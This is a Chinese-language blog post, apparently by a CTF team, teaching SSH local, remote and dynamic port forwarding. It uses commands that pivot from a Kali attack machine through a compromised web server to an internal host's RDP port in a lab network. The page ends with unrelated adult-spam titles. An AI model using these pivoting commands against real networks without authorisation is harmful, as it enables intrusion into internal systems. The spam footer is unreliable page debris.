<kbd id="afajh"><form id="afajh"></form></kbd>
<strong id="afajh"><dl id="afajh"></dl></strong>
    <del id="afajh"><form id="afajh"></form></del>
        1. <th id="afajh"><progress id="afajh"></progress></th>
          <b id="afajh"><abbr id="afajh"></abbr></b>
          <th id="afajh"><progress id="afajh"></progress></th>

          SSH轉(zhuǎn)發(fā)實戰(zhàn)

          共 1655字,需瀏覽 4分鐘

           ·

          2021-06-22 09:31


          點擊上方“藍字”,關注更多精彩


          SSH 關于ssh的命令,參考下方:

           -C 壓縮傳輸,提高傳輸速度。

           -f 將 SSH 傳輸轉(zhuǎn)入后臺執(zhí)行,不占用當前 shell

           -N 建立靜默連接(建立了連接,但看不到具體會話)

           -g 允許遠程主機連接本地用于轉(zhuǎn)發(fā)的端口。

           -L 本地端口轉(zhuǎn)發(fā)

           -R 遠程端口轉(zhuǎn)發(fā)

           -D 動態(tài)轉(zhuǎn)發(fā)( SOCKS 代理)

           -p 指定 SSH 端口



          SSH 可用場景如 :

          -本地轉(zhuǎn)發(fā)

          -遠程轉(zhuǎn)發(fā)

          -動態(tài)轉(zhuǎn)發(fā)等模式。

          下面是3臺測試環(huán)境機器。


          攻擊機kali:192.168.0.103

          Linux:網(wǎng)卡1. 192.168.0.106,網(wǎng)卡2. 192.168.52.144

          內(nèi)網(wǎng)2008:192.168.52.138



          -本地轉(zhuǎn)發(fā)

          場景1:內(nèi)網(wǎng)Linux可以和2008 互相訪問,kali-103可以訪問Linux內(nèi)網(wǎng)的web服務器 但是無法訪問2008,以lingx內(nèi)網(wǎng)web 服務器為跳板,訪問2008 遠程桌面3389端口。

          在kali執(zhí)行以下命令,將內(nèi)網(wǎng)2008的 3389 端口映射到kali的 4444 端口上。

          攻擊機執(zhí)行命令:ssh -CfNg -L 4444:192.168.52.138:3389 [email protected]

          上述命令意思是:ssh -CfNg -L 攻擊主機端口:內(nèi)網(wǎng)主機IP:內(nèi)網(wǎng)主機端口 Web服務器ssh用戶名@Web服務器IP。

          使用命令rdesktop 127.0.0.1:4444  訪問本地4444端口就是訪問目標機器的3389端口。


          -遠程轉(zhuǎn)發(fā)

          場景2:內(nèi)網(wǎng)Linux可以和2008 互相訪問,kali-103可以訪問Linux內(nèi)網(wǎng)的web服務器 但是無法訪問2008,以lingx內(nèi)網(wǎng)web 服務器為跳板,訪問2008 遠程桌面3389端口。

          在kali執(zhí)行以下命令,將內(nèi)網(wǎng)2008的 3389 端口映射到kali的 4444 端口上。

          跳板機執(zhí)行命令:ssh -CfNg -R kali主機端口:內(nèi)網(wǎng)2008 IP:內(nèi)網(wǎng)2008主機端口 kali主機 ssh 用戶名@kali IP

          可以在拿到 Web 服務器的 Shell 后,采用遠程轉(zhuǎn)發(fā)的方式,即利用 Web 服務器 SSH 連接到攻擊主機上進行代理轉(zhuǎn)發(fā)。

          ssh -CfNg -R 6001:192.168.52.143:3389 [email protected]

          kali攻擊機連接目標3389  rdesktop 127.0.0.1:6001 


          動態(tài)轉(zhuǎn)發(fā)


          場景一樣

          ssh -CfNg -D 攻擊主機端口 Web服務器ssh用戶名@Web服務器IP

          ssh -CfNg -D 1008 [email protected]

          1.Kali 設置代理leafpad /etc/proxychains4.conf

          1.這樣設置是為了使用代理工具可以掃描或者能跟內(nèi)網(wǎng)的IP 通信。

          2.瀏覽器設置代理就可以訪問2008了。


          境外站點滲透測試實戰(zhàn)-SSH轉(zhuǎn)發(fā)





          更多CTF-Wrietup 請關注EDI安全!

          EDI安全的CTF戰(zhàn)隊經(jīng)常參與各大CTF比賽,了解CTF賽事,我們在為打造安全圈好的技術氛圍而努力,這里絕對是你學習技術的好地方。這里門檻不是很高,但師傅們經(jīng)驗豐富,可以帶著你一起從基礎開始,只要你有持之以恒努力的決心,下一個CTF大牛就是你。

          歡迎各位大佬小白入駐,大家一起打CTF,一起進步。                    

           



          掃碼關注

          了解更多



          瀏覽 48
          點贊
          評論
          收藏
          分享

          手機掃一掃分享

          分享
          舉報
          評論
          圖片
          表情
          推薦
          點贊
          評論
          收藏
          分享

          手機掃一掃分享

          分享
          舉報
          <kbd id="afajh"><form id="afajh"></form></kbd>
          <strong id="afajh"><dl id="afajh"></dl></strong>
            <del id="afajh"><form id="afajh"></form></del>
                1. <th id="afajh"><progress id="afajh"></progress></th>
                  <b id="afajh"><abbr id="afajh"></abbr></b>
                  <th id="afajh"><progress id="afajh"></progress></th>
                  狼人狠狠干 | 成人性生活无码免费视频 | 美女久久久久 | 熟女在线视频 | 9·1成长视频蘑菇视频大全 |